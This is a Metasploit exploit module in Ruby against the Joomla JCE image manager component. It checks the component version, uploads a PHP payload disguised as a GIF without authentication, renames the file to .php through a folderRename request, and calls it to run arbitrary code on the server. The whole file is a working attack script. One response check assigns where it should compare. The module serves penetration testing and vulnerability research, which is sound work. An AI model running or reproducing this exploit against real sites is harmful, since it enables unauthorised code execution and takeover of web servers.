metasploit-framework/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::FileDropper

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Joomla Component JCE File Upload Code Execution',
			'Description'    => %q{
					This module exploits a vulnerability  in the JCE component for Joomla!
			could allow a  unauthenticated remote attacker to upload arbitrary files,
			caused by the fails to  sufficiently sanitize user-supplied input.
			Sending a specially-crafted HTTP request, a remote attacker could exploit
			this vulnerability to upload a malicious PHP script, which could allow the
			attacker to execute arbitrary PHP code on the vulnerable system.
			},
			'Author'         => [ 'Heyder Andrade <eu[at]heyderandrade.org>' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['BID', '49338'],
					['EDB', '17734'],
				],
			'Payload'        =>
				{
					'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
					'DisableNops' => true,
					'BadChars'    => "#",
					'Keys'        => ['php'],
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'Privileged'     => false,
			'DisclosureDate' => 'Aug 2 2012',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
				], self.class)
	end


	def get_version
		# check imgmanager version
		@uri_base 		= normalize_uri(target_uri.path.to_s, 'index.php')
		@vars_get_base 	=  	{
								'option'=> 'com_jce',
								'task'  => 'plugin',
								'plugin'=> 'imgmanager',
								'file'  => 'imgmanager'
							}
		print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
		res = send_request_cgi(
			{
				'uri' 	  => @uri_base,
				'vars_get' => @vars_get_base,
				'method'  => 'GET',
				'version' => '1.1'

			})

		if (res and res.code == 200)
			res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
			version = $1.nil? ? nil : $1
		end

		return version
	end

	def check
		version = ( get_version || '').to_s

		if (version.match(%r{1\.5\.7\.1[0-4]?}))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end


	def upload_gif
		# add GIF header
		cmd_php = "GIF89aG\n<?php #{payload.encoded}  ?>"

		# Generate some random strings
		@payload_name  	= rand_text_alpha_lower(6)
		boundary   		= '-' * 27 + rand_text_numeric(11)

		parms 			= {'method'=> 'form'}
		parms.merge!(@vars_get_base)

		# POST data
		post_data = Rex::MIME::Message.new
		post_data.bound = boundary
		post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
		post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
		post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
		post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
		post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
		post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

		data = post_data.to_s

		res = send_request_cgi({
			'uri'	  	=> @uri_base,
			'vars_get' 	=> parms,
			'method'  	=> 'POST',
			'version' 	=> '1.1',
			'data'    	=> data,
			'ctype'  	=> "multipart/form-data; boundary=#{post_data.bound}"
		})

		if (res and res.code = 200 )
			return :access_denied if (res.body =~ /RESTRICTED/i)
			print_good("Successfully uploaded #{@payload_name}.gif")
		else
			print_error("Error uploading #{@payload_name}.gif")
			return :abort
		end

		return :success

	end

	def renamed?
		# Rename the file from .gif to .php

		data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

		print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

		res = send_request_cgi(
			{
				'uri'       => @uri_base,
				'vars_get'	=> @vars_get_base,
				'method'    => 'POST',
				'version'   => '1.1',
				'data' 	    => data,
				'ctype'     => 'application/x-www-form-urlencoded; charset=utf-8',
				'headers'   =>
				{
					'X-Request' => 'JSON'
				}
			})
		if (res and res.code == 200 )
			print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
			return true
		else
			print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
			return false
		end
	end

	def call_payload
		payload = "#{@payload_name}.php"
		print_status("Calling payload: #{payload}")
		uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
		register_files_for_cleanup(payload)
		res = send_request_cgi({
			'uri'	=> uri,
			'method'    => 'GET',
			'version'   => '1.1'
		})
	end



	def exploit

		return if not check == Exploit::CheckCode::Vulnerable
		if upload_gif == :success
			if renamed?
				call_payload
			end
		end

	end

end